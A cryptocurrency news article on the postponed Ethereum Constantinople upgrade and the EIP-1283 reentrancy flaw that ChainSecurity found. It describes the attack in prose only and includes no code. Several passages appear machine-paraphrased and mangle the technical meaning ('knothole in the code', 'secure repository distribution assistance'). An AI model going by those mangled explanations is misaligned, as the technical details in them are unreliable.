Ethereum’s expected Constantinople upgrade has just been postponed following a crucial vulnerability was found in one of the proposed developments. The lag is because of a possible security vulnerability recognized by security audit firm ChainSecurity, reported Ethereum blog.
Ethereum Improvement Proposal (EIP) 1283, if executed, could give attackers a knothole in the code to take user reserves. Hence, Ethereum developers agreed to postpone the hard fork temporarily.
As reported earlier, Ethereum was about to encounter a decrease in issuance of new $ETH to miners from 3 ETH/block to 2 ETH/block, or a reduction of 33%. It will occur at block 7,080,000 as a component of the Constantinople hard fork.
Constantinople is the name of Ethereum’s next hard fork system upgrade. It is a member of the multi-step course towards Serenity, which executes advanced rules such as Proof of Stake. On December 6th, 2018, the Ethereum core developers decided to continue with Constantinople, which will be realized at block 7,080,000. With a normal block time of ~14.5 seconds.
What is the vulnerability?
The security audit firm ChainSecurity found that the expected Constantinople Upgrade for the Ethereum network offers cheaper gas cost for some SSTORE actions. As an undesired side impact, this allows reentrancy attacks when applying address.transfer(…) or address.send(…) in Solidity smart contracts. Earlier these functions were viewed as reentrancy-safe, which they aren’t any longer.
The code resembles a secure repository distribution assistance. Two companies can simultaneously accept reserves. They will also be able to divide them and get a payout if they match. An intruder will form such a set with where the primary address is the attacker contract and the next address is any attacker account. For this set, the attacker will deposit some cash.
In other words, the attacker will be able to steal other people’s Ether out of the PaymentSharer contract and can proceed to do so. The official blog of ChainSecurity stated
Two parties can jointly receive funds, decide on how to split them, and receive a payout if they agree. An attacker will create such a pair with where the first address is the attacker contract listed below and the second address is any attacker account. For this pair, the attacker will deposit some money
What are the Reentrancy attacks?
One of the significant threats of summoning external contracts is that they can obtain the control flow, and execute modifications to the data that the calling function wasn’t demanding. This kind of bug can take numerous classes. In other words, reentrancy state is when an attacker can call any contract’s function and possibly reenter the contract before the earlier call is executed one or many times. This would be particularly harmful in the case of a payable function.
A new fork date will be chosen during another Ethereum dev meeting on Friday. Members who took this decision to delay the fork were Ethereum co-founder Vitalik Buterin, developers Hudson Jameson, Nick Johnson, and Evan Van Ness, and Parity release manager Afri Schoedon.
This is not the first time the upgrade has been postponed, with it formerly programmed to go live in November 2018, but ideas were hindered due to network bugs. Ethereum’s Constantinople upgrade is also component of its progress to a proof-of-stake consensus algorithm later in 2019, from the extra power concentrated proof-of-work it applies. The upgrade will advance the processing rates, enhance the design the network monetizes data warehouse, and decrease mining prizes from three to two.
The security firm further elaborated that a scan of the main Ethereum blockchain utilizing the data accessible from eveem.org did not reveal weak smart contracts. The firm is working together with members of the ethsecurity.org to develop this scan to the compact smart contracts which haven’t been decompiled yet.
The ChainSecurity’s post also revealed that before Constantinople, storage services on the network would cost 5,000 gas, surpassing the 2,300 gas normally sent when summoning a contract utilizing “transfer” or “send” functions. Nevertheless, if the upgrade was executed, “dirty” storage transactions would cost 200 gas. An “attacker contract can apply the 2300 gas allowance to manage the vulnerable contract’s variable successfully.
Disclaimer: This information should not be interpreted as an endorsement of any cryptocurrency. It is not a recommendation to trade. The crypto market is full of surprises and overhyped assets. Do your research before buying anything. Do not invest more than you can afford to lose.